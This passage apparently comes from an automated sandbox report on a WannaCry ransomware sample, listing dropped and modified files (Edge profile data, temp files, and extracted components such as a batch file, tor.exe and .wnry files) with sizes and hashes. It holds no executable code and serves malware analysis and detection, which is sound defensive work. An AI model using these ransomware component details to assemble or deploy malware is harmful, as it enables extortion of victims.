                                                                                      MD5

                                                                                      3af30c722c81df928016e22b2b7c7c67

                                                                                      SHA1

                                                                                      e7438cacfcbad1ea080d062cc7531ac5c45907e8

                                                                                      SHA256

                                                                                      80819e38fe39d15526e9028e6b41087faed204767e23c2d5fc0c92e017475644

                                                                                      SHA512

                                                                                      36b82d7cf4ac379aa43cd7b5f7b11f9a48f28026769408b132e1ff68184e2478f5d7c03bb387899072778314332f117be13774bc81a2682b31123795ed056947

                                                                                    • C:\ProgramData\AVG\Persistent Data\Antivirus\Logs\AvEmUpdate.log

                                                                                      Filesize

                                                                                      4KB

                                                                                      MD5

                                                                                      ef536c318aeb2e270545af74533b8b1e

                                                                                      SHA1

                                                                                      0781692698b4d07a04ed5c4aa54be33614315d0d

                                                                                      SHA256

                                                                                      54b230e6f7ebe0be8ca10aebc592af83585a977fc8706b0f523023e7b848402b

                                                                                      SHA512

                                                                                      ae2c89c1726846318fd228da7002a57df999e9eae37e962cb9b659c31c31ab1e01bdad1c4e067748d69d3ec88307bcb6bbebc10068d22e42e5b3361e26466c52

                                                                                    • C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      41c38fd369302db635a9455a02e44c92

                                                                                      SHA1

                                                                                      5c48996a544080786835fd45f649d483d8087c5a

                                                                                      SHA256

                                                                                      58e6ac5a1e1746c635cf48ca14dee8fd1fd4022e7978e040a5c29f45a1dc5dcd

                                                                                      SHA512

                                                                                      072380fe0e51dda5ec9125354c56aa680404f4078fa65016477a7afa8d91efe4e2a74aff9497e66d174bfb473f4ad1f772ba14e0de73674aa425e7a579993fa2

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\529b9f0c-48d1-4574-9ad6-b417b8133721.tmp

                                                                                      Filesize

                                                                                      11KB

                                                                                      MD5

                                                                                      483f6abe58f85c12d8d7dc71fe6831d1

                                                                                      SHA1

                                                                                      8d808fd61f8a5996b6c6a9b67ef8740bc681fdf3

                                                                                      SHA256

                                                                                      ccc92e41a4c11c471e005654383f0f3cbea523b54a43b5c2d1d95b2d1372b0ee

                                                                                      SHA512

                                                                                      c05b2ba382b369917be4c2b14355cf70596efbf44505bf173d574eca7eddb4dad1ca738afd3e6e703e209b88f44c2f1c13b792287db03cb4c3841251c04f084a

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                      Filesize

                                                                                      152B

                                                                                      MD5

                                                                                      a0407c5de270b9ae0ceee6cb9b61bbf1

                                                                                      SHA1

                                                                                      fb2bb8184c1b8e680bf873e5537e1260f057751e

                                                                                      SHA256

                                                                                      a56989933628f6a677ad09f634fc9b7dd9cf7d06c72a76ddbb8221bc4a62ffcd

                                                                                      SHA512

                                                                                      65162bf07705dfdd348d4eaf0a3feba08dc2c0942a3a052b4492d0675ab803b104c03c945f5608fac9544681e0fe8b81d1aaca859663e79aa87fcb591ddb8136

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                      Filesize

                                                                                      152B

                                                                                      MD5

                                                                                      ded21ddc295846e2b00e1fd766c807db

                                                                                      SHA1

                                                                                      497eb7c9c09cb2a247b4a3663ce808869872b410

                                                                                      SHA256

                                                                                      26025f86effef56caa2ee50a64e219c762944b1e50e465be3a6b454bc0ed7305

                                                                                      SHA512

                                                                                      ddfaa73032590de904bba398331fdbf188741d96a17116ada50298b42d6eb7b20d6e50b0cfae8b17e2f145997b8ebce6c8196e6f46fbe11f133d3d82ce3656db

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

                                                                                      Filesize

                                                                                      64KB

                                                                                      MD5

                                                                                      d6b36c7d4b06f140f860ddc91a4c659c

                                                                                      SHA1

                                                                                      ccf16571637b8d3e4c9423688c5bd06167bfb9e9

                                                                                      SHA256

                                                                                      34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

                                                                                      SHA512

                                                                                      2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

                                                                                      Filesize

                                                                                      69KB

                                                                                      MD5

                                                                                      a127a49f49671771565e01d883a5e4fa

                                                                                      SHA1

                                                                                      09ec098e238b34c09406628c6bee1b81472fc003

                                                                                      SHA256

                                                                                      3f208f049ffaf4a7ed808bf0ff759ce7986c177f476b380d0076fd1f5482fca6

                                                                                      SHA512

                                                                                      61b54222e54e7ab8743a2d6ca3c36768a7b2cf22d5689a3309dee9974b1f804533720ea9de2d3beab44853d565a94f1bc0e60b9382997abcf03945219f98d734

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

                                                                                      Filesize

                                                                                      35KB

                                                                                      MD5

                                                                                      bd72bbee586e1ccd001d0b09fb4a0479

                                                                                      SHA1

                                                                                      d6a9f9e658642090a2982ce8b7c59571ec126d9b

                                                                                      SHA256

                                                                                      d396d7e26505c676cd1bc38ab1c1875417d68120235f79199c40f4f8fcea58cc

                                                                                      SHA512

                                                                                      5b8c5b52edfd060c015b3ead4db3307b56b7de5d90b30022026bd648f694da3a6c033e569ae2fb88e456d3860aa19c63bac5acd4c7cb1ff57b35b57acf534813

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

                                                                                      Filesize

                                                                                      65KB

                                                                                      MD5

                                                                                      56d57bc655526551f217536f19195495

                                                                                      SHA1

                                                                                      28b430886d1220855a805d78dc5d6414aeee6995

                                                                                      SHA256

                                                                                      f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

                                                                                      SHA512

                                                                                      7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

                                                                                      Filesize

                                                                                      19KB

                                                                                      MD5

                                                                                      2e86a72f4e82614cd4842950d2e0a716

                                                                                      SHA1

                                                                                      d7b4ee0c9af735d098bff474632fc2c0113e0b9c

                                                                                      SHA256

                                                                                      c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

                                                                                      SHA512

                                                                                      7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

                                                                                      Filesize

                                                                                      88KB

                                                                                      MD5

                                                                                      b38fbbd0b5c8e8b4452b33d6f85df7dc

                                                                                      SHA1

                                                                                      386ba241790252df01a6a028b3238de2f995a559

                                                                                      SHA256

                                                                                      b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

                                                                                      SHA512

                                                                                      546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

                                                                                      Filesize

                                                                                      1.1MB

                                                                                      MD5

                                                                                      07a91d20c88cd93205062606e2ab5d89

                                                                                      SHA1

                                                                                      4448c7193cdd2cf8d80f04ae18b93d5ad467d96d

                                                                                      SHA256

                                                                                      3601e32eb6e6745b903097b431b2b92efe8f1a57aa58eb79668eb19067f4a593

                                                                                      SHA512

                                                                                      d4154edff2ad485a369917cfec8fbd0946ec3ded16ae4e40da3c18e233fc1eb06c512d2301d7481145ecc4dc48416f010e83dd295a345d348f99c0f2048da71d

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      8b2813296f6e3577e9ac2eb518ac437e

                                                                                      SHA1

                                                                                      6c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86

                                                                                      SHA256

                                                                                      befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d

                                                                                      SHA512

                                                                                      a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                      Filesize

                                                                                      5KB

                                                                                      MD5

                                                                                      e5a6f03e28ada60572d26b0e40ea4bfe

                                                                                      SHA1

                                                                                      cb9b75f22ab97b158cf107a77ab3b63012f6a341

                                                                                      SHA256

                                                                                      45d1b4c6fcaeb3e38c7d9cfaa3ae6db569d9dcbbb4cbdf2b02d7a3bdc9f0cc48

                                                                                      SHA512

                                                                                      7d0945c2f97b1d3651428ac009c2a383976d7f111207fc64ebb47b4f732983cb478dc0766287eb45dc9935426d62fb8b74fd1955e88445f95716301fae8353d0

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      f9b94905b29d6158360b124cbb3eb4ce

                                                                                      SHA1

                                                                                      2308ab8dd314c1f2e9b949ddbbf3bd8d395a6980

                                                                                      SHA256

                                                                                      3571e9e3c3c1b530c48ae6b7ac74e6e2dfd245358fe3fdff7d5a25daef73161a

                                                                                      SHA512

                                                                                      200a931e1798ec61dd45fc15a72ec6be73ac354d5259a2478a754ea7ba757d30838b365af0a02ae21c6910fa378b9a7542d5a8a9d5978eb518675fbf969a48e5

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                      Filesize

                                                                                      4KB

                                                                                      MD5

                                                                                      6f4527c9f98d4741dde7a016778c4c7b

                                                                                      SHA1

                                                                                      9723f7dae034f4de8cfc4fddad484f999aec40bb

                                                                                      SHA256

                                                                                      6a02ddb599e1a7d071eb3fc1355c568afb8722901801e0313d3336161e529f52

                                                                                      SHA512

                                                                                      bf9979ff1f827cd4ec924e1673714bec50ecd45bbd3c1efb61cf8511378054c365781d6251f4ae756000a765ac56a776ac62a65b851198d5e1b84e77a55b1785

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      1e5c3e782f7a68bcd11c98388294c31f

                                                                                      SHA1

                                                                                      24ab8fb95baafd27c1b383823d8358bc7a98d606

                                                                                      SHA256

                                                                                      f788754012d57feeda78880eca184027ae6f05bdaa5341ed72ce23d0d5172155

                                                                                      SHA512

                                                                                      4752f084c8efe05f3f941868c001acd09f61d3d755396ba0e38cd16886b00f4f660a82bb91f30a1a564cb2744ea418da7cd432affc49fc9dc7e0b380176b9985

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                      Filesize

                                                                                      1019B

                                                                                      MD5

                                                                                      09e24ab5114e43c184630a3954296eb9

                                                                                      SHA1

                                                                                      271229c4107b55751e26f8627eb3d920d0393f6e

                                                                                      SHA256

                                                                                      ed43e388defe2e65d844961f46cd9c065c9562aa7dd4c364bb43248b59366764

                                                                                      SHA512

                                                                                      63e8184d104aa8aff04eb883e947f6240cc7317884ce7c6eec66c2fef3b5d8a5f3fcf06c50b51b4285207edea89a8c3b477f6dd6b3d8faaa0f6fbc8709b8445d

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      5KB

                                                                                      MD5

                                                                                      68a1c91a8e13fbd1b0b4da241d13c1ae

                                                                                      SHA1

                                                                                      86303cc33ea05896d13de5436858b5903b18bc09

                                                                                      SHA256

                                                                                      8988a2148656712fd2c0d5b268f5c1780b5a3df3c1a57f8be635a1e69725ce1f

                                                                                      SHA512

                                                                                      febfd54f8d36308ec8a5eeb5ad38e16a7479a56d7344a34cda8b4ef88a011c2235de980896e26a920a1ae2d0287675f4ed32d4dd9608a5b79a2076fe2506461c

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      4d4c25e50ee14357a46edc68a90b3e39

                                                                                      SHA1

                                                                                      93bf8a1e50358cd4d57a127dfafb051fdde99010

                                                                                      SHA256

                                                                                      2de7e9e8ef4024a2af4e947340678e9008f9ea7904a28e5ebf3866ac5478dc79

                                                                                      SHA512

                                                                                      f671dd8b5af874d371b0e9d2edb1167169071f9034a49fc9766047920c85b079bc5d0654198f3be69d12df0da9b4762f89a6a59c45d7ece7eacb28b4d35b9c02

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      7KB

                                                                                      MD5

                                                                                      f5f7b3fe3f4bf1f49a7d73a6352f6931

                                                                                      SHA1

                                                                                      58926de5e03c4181996d22625fad87dca9722c82

                                                                                      SHA256

                                                                                      d80204abe3d7bd3081c1413b3917441ab06962f29366183447f09beb54d399b7

                                                                                      SHA512

                                                                                      8ca0509ceecb2d6b00c07b3cf51376b30ceeac7871de26e6d8a98477dbc7abe67ec885ac88d098e41ffed96a58a2b979f552de9f667bba9ffe7f84aaeb639bfc

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      fa69d0528facee2a91938e251a1a7b2a

                                                                                      SHA1

                                                                                      89f5577c3c1ff1d26c053e43b7a9afb83346580c

                                                                                      SHA256

                                                                                      70842a3bc6b2111ddee19832745d79ce6e8c609d3b1de49b3516ed800ad4051f

                                                                                      SHA512

                                                                                      2b04d3bd1ae47c75c05e12cb44872ef9d4618508c6930bd24bdf48dc2d6a2fb6b6e029c080633d3255b4dec8a7d6596b5d6532af4dca13fecc0e554884380e24

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      5KB

                                                                                      MD5

                                                                                      784fed34f72422aa61056e1aeab4c3c4

                                                                                      SHA1

                                                                                      efd575d72360996afdb405ffa9b7868c883ba64c

                                                                                      SHA256

                                                                                      8e3f3e09fd91d56146e5d474919f49740fee6841262bb71106009401c562ce61

                                                                                      SHA512

                                                                                      20037fe2d399959fb6754bd3017c9e591cfd8ac70a718749b0b71918cd83226ab91fc5b60df8aa510045e8bfc6e726eb0d10eded9159589e2dd2751330b45b6b

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      8KB

                                                                                      MD5

                                                                                      57893fe6cc698bb4e22e548dbfb75d9e

                                                                                      SHA1

                                                                                      b3f4ef7dac7bdfc0cbed8475d4734d6752451aa4

                                                                                      SHA256

                                                                                      8ad1be02db41a0e0bb5a9a9933375e2348a0828beb7da9802f1e82da001693a0

                                                                                      SHA512

                                                                                      9c5d0412832d3570b88cf60432ad967cd32e80201ecfd96c319564a840e8e95b983de25ef53cae07c9fb0ba6a39c967a4fa95fe5a0ad922361df6561fc228e8f

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      47b731fbfb0f485029d24d72593c2386

                                                                                      SHA1

                                                                                      3f309b0e65eda41624b6de2989fe3b8239a3a1da

                                                                                      SHA256

                                                                                      2281644e042efecccc6d846f389bc1fb7b984d0749a8fb78ad7897cced23c0e8

                                                                                      SHA512

                                                                                      7f176f26c5b222bef6d48dad74052d6838577ab03283d0b39a869d1be2941850da2545dca663d71bad1d6c8acfc8e4d03abc60ab9ef7ecc54572d74e5dcecad0

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      4KB

                                                                                      MD5

                                                                                      58b52bb1feccc70c9451c29513616446

                                                                                      SHA1

                                                                                      be3ae7b4eb929262f9aa0df3b8aebafc4d8b87a3

                                                                                      SHA256

                                                                                      cef7e4335946d0c899a5207387005980f1e5141c48ac3decebf2c18025872fc3

                                                                                      SHA512

                                                                                      f0eecc3a504f33367041257ed5d80250c94a1978daaaf682e0ef527f52dcc08d35df8af687a59577da3ccfbc8d6c78cbe080ea5f7dc3a0b0ef6ab936a7c2f7ea

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      4KB

                                                                                      MD5

                                                                                      5050d0e91f973cb987923f3ae27985ec

                                                                                      SHA1

                                                                                      f35db0e3e0cfce39e2532a0f8ca780de84bd3438

                                                                                      SHA256

                                                                                      a415a162357dd40110c8622def9b9971e8948f81d34d71f53abba13d8a6bdb3b

                                                                                      SHA512

                                                                                      bc9f7e2f023d9afe440f48db897ba9c45079347dec4436cb045da5d8b2547078096c4616f47ebf44241c946298c8e2540d84b458cb51d14bda7a70729e7b2f84

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      3887754363933dd475daa446f85c8a13

                                                                                      SHA1

                                                                                      d0f4be8fac3883e891118de17b3c17799f1be88e

                                                                                      SHA256

                                                                                      f3e6fb1152b7da4ecf39575960c5835d0f9e4d249dbc180a10e96becb16aba6a

                                                                                      SHA512

                                                                                      560d3b22cab20b7535d8868d2f0fc2693a385e0ab019a422dc7b93d23b896d4b5c3d2ee8c1c6e6fad03f316790aec2b1b883900550ffc1dc6d8f250a455173c0

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      583b1c69ec35b0d4c2cd4c37827db30e

                                                                                      SHA1

                                                                                      170d35b9ee57e2be93a17f362d0554519962e1d7

                                                                                      SHA256

                                                                                      249181b7a5fbf9553accdcf4e388447e70f7785d561cc0b16a593bfca5e1b4fc

                                                                                      SHA512

                                                                                      640c76cb695ee3157ac73257b1c4a8d562340c39e46e7ec282c50fa728f2e966c75a44fa66b5f570469bbc577a4f907861f483d7788285db2dc7ab3978ae99ff

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      110c2ba060f5b5bb09238e89ba0a677d

                                                                                      SHA1

                                                                                      49ae144a4176f3671d1dd312972899ba3dbf2c9e

                                                                                      SHA256

                                                                                      2cdd1eef2f0550f991fa463576906b8ec4669b3bff4fce48e0ce99e8c857fd8f

                                                                                      SHA512

                                                                                      b11d601eb831fd8c210f634ff1824b5a9c09b0f625424399964c7eb429a573faf484a85b84bba6e14411d09853225cc06abc3b4794fa599be770da4a09ca253a

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      3de8cfe083f39caef076208fe4b91cf9

                                                                                      SHA1

                                                                                      3da0d738a819d0299a5b78741a3fc490c726a269

                                                                                      SHA256

                                                                                      4d8abf4e5cc62cb4d93a2ece0e1feae8918a76abf57de16e64178d032483c2e5

                                                                                      SHA512

                                                                                      206de29d2ecbd6c2151498e18571c4d6a6150207c004df2699f528adfacad9665f77353b9ddad2e9eefa16d19d19d088adeebc574d1d93647144b41aec029d5e

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      44ed33256024aff15e58cfadafb70c64

                                                                                      SHA1

                                                                                      a9d79a3b6ce796dcbd488e2a2aade2692afa698c

                                                                                      SHA256

                                                                                      df1a7cd6abc67e498d7cfaf8936a1292b0eca3c2fea5adece256bb44599dfd27

                                                                                      SHA512

                                                                                      38f7599c04d868819a163cc9508825ba6bac7f19d49edf27e4353eb8303420337d9ae0bd45a23b9bdb99f376062ccd062ba2681dfc99c7d954057ee50643a4c4

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      4KB

                                                                                      MD5

                                                                                      294ac1735d5b62934be108fdd95b09a4

                                                                                      SHA1

                                                                                      884448425e9b450c44dab891e2fea72f2fef925c

                                                                                      SHA256

                                                                                      05e57f247f29a7b1c2931ce07ad27c736fbf94e47beac24a52ade730c26ab924

                                                                                      SHA512

                                                                                      30d2bb396a3dafb658f07d5cfdea83ccd8fe43c9555faf8bae5b4318d13ae2ea44f23c4332f03f02e0f41b2e8612c9b57ccfaf48c57f1ee326d7acc990cf85f2

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      2f1942fa31c1a938ea700dcfdc22c9a8

                                                                                      SHA1

                                                                                      61c7851e798be20c280e323a75cc516fe821bc65

                                                                                      SHA256

                                                                                      621a35d8e81652f5232f0129b6b76ca76a3068fe1ef5f4a1dd31150ac3bb2629

                                                                                      SHA512

                                                                                      95f4bcea33b56527b7d514bcb0d2957ea5112602c270b73877a066262af7c14d425b61b6a5f0360c170e70b1b61a5f624ae09606bd4c336b5d173faa9e718282

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5854a3.TMP

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      fe4309e68e2a07ca3c9f0b3fdc7067f4

                                                                                      SHA1

                                                                                      3b5108b44b2b38cd51a1fe66d89fc903cfb9ab3d

                                                                                      SHA256

                                                                                      ef9809fd7229e44bb4888cd96f265e9091f3e9caa83720a49435fba755159af1

                                                                                      SHA512

                                                                                      ce06763a433bf46dd6d611fa2446d580a8644ff27b7b959f54cbe16ef7269cd6024c72db1110f43ee750a3eeb3c2252312ae5650c22f752a3baab7e8a0807da3

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                      Filesize

                                                                                      16B

                                                                                      MD5

                                                                                      46295cac801e5d4857d09837238a6394

                                                                                      SHA1

                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                      SHA256

                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                      SHA512

                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                      Filesize

                                                                                      16B

                                                                                      MD5

                                                                                      206702161f94c5cd39fadd03f4014d98

                                                                                      SHA1

                                                                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                      SHA256

                                                                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                      SHA512

                                                                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                      Filesize

                                                                                      11KB

                                                                                      MD5

                                                                                      7ad7f0988df01972ef03517fc55140a3

                                                                                      SHA1

                                                                                      09bdc4001eb14bf869170035de6f809feac172bc

                                                                                      SHA256

                                                                                      7dd930c5da17bd62a89eb97fca93e8ad5d360a7eece2fa8084233c3fc3599e5c

                                                                                      SHA512

                                                                                      89b0a1c9e97fb3524a92a29255c0a229aee05701da818fe809ed8c722d688561bdeed4f9c84988c4e0de9f393f20dea53b7f7ca956618d7f9ac0063e33897590

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                      Filesize

                                                                                      11KB

                                                                                      MD5

                                                                                      4e406e47c467f36663af6a95be2327d6

                                                                                      SHA1

                                                                                      64ea5a1736fa82040c9164c3dc233fd346ef5ff1

                                                                                      SHA256

                                                                                      51319a720bb5b93c278d2a2264d5ce01a3da275d35635fa16dda96040c908243

                                                                                      SHA512

                                                                                      45bb597d89d61c9c94319f9ba8b5331996f5e3604b5380c87a6e0a866f9ab9dd57e8bbdb5c4d6244c7a6874dd3905b2c80560e514a0883b0d5d0917d7fe89983

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                      Filesize

                                                                                      11KB

                                                                                      MD5

                                                                                      e119a95c2e757107c30e0e3e29e5f321

                                                                                      SHA1

                                                                                      24aa3b32a9a22280bc3b8b955be35139b5eb7cfe

                                                                                      SHA256

                                                                                      856988b9dedacc1b75aff9850d193b16c637756df92b1761c07afb9094217b70

                                                                                      SHA512

                                                                                      f4c8fde8fbdad76de937596da7db61a4632030bca674863704f01b94b806c3d538490a65b88bcea4d16f5b05b1101654eda485bee1824b6465c72babe653208b

                                                                                    • C:\Users\Admin\AppData\Local\Temp\D566D7D7-DCD6-471C-8109-BE0AD33199E3

                                                                                      Filesize

                                                                                      64B

                                                                                      MD5

                                                                                      22417b5d5eb168147f2c237d658a7163

                                                                                      SHA1

                                                                                      6ae67daf07c0a187f397923ecba497e5ab01ed58

                                                                                      SHA256

                                                                                      f1945b77f21bf5b8174bc94d0d69d4446baffd6808185554f8ae541e4254ecb1

                                                                                      SHA512

                                                                                      392b79a63b451495cc81877c288c0068d6c159bf0d7ce9ac0cc290128e57a5a1ebe0569dcbab85433448b3c1928be03cf01300ec7ae99573cfc4ef8c4c9b3cb8

                                                                                    • C:\Users\Admin\AppData\Local\Temp\F07D8C6A-04B6-4025-869C-70A788D7B5C0

                                                                                      Filesize

                                                                                      72B

                                                                                      MD5

                                                                                      5b3361c56513f895a3a558df639d93c3

                                                                                      SHA1

                                                                                      ed11139cb57ac14f454c24832135c5e5597c4fe3

                                                                                      SHA256

                                                                                      6f2c57fb1799f6d1a2f309b39931ab6c06fcb3995a39f8414df810fd9dd83c91

                                                                                      SHA512

                                                                                      fa6b66d993f867113656b202c66600f5c4594a3bc650dbcac8142022362107be42dc84dd4ef2fcd1677a3b529e2c2509b3e7e3c4af46f1943cfd2558c56929f7

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\190841712576141.bat

                                                                                      Filesize

                                                                                      400B

                                                                                      MD5

                                                                                      ab68d3aceaca7f8bb94cdeabdcf54419

                                                                                      SHA1

                                                                                      5a2523f89e9e6dde58082d4f9cf3da4ccc4aae26

                                                                                      SHA256

                                                                                      3161fdccd23f68410f6d8b260d6c6b65e9dfb59ef44aef39ebb9d21e24f7c832

                                                                                      SHA512

                                                                                      a5de5e903e492a6c9bcf9fbc90b5f88a031a14fca8ee210d98507560290d399f138b521d96e411385279f47e8de6a959234a094e084c2e7e6c92c0ea57778f64

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

                                                                                      Filesize

                                                                                      933B

                                                                                      MD5

                                                                                      f97d2e6f8d820dbd3b66f21137de4f09

                                                                                      SHA1

                                                                                      596799b75b5d60aa9cd45646f68e9c0bd06df252

                                                                                      SHA256

                                                                                      0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

                                                                                      SHA512

                                                                                      efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe

                                                                                      Filesize

                                                                                      3.0MB

                                                                                      MD5

                                                                                      fe7eb54691ad6e6af77f8a9a0b6de26d

                                                                                      SHA1

                                                                                      53912d33bec3375153b7e4e68b78d66dab62671a

                                                                                      SHA256

                                                                                      e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

                                                                                      SHA512

                                                                                      8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnry

                                                                                      Filesize

                                                                                      1.4MB

                                                                                      MD5

                                                                                      c17170262312f3be7027bc2ca825bf0c

                                                                                      SHA1

                                                                                      f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                      SHA256

                                                                                      d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                      SHA512

                                                                                      c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\c.wnry

                                                                                      Filesize

                                                                                      780B

                                                                                      MD5

                                                                                      383a85eab6ecda319bfddd82416fc6c2

                                                                                      SHA1

                                                                                      2a9324e1d02c3e41582bf5370043d8afeb02ba6f

                                                                                      SHA256

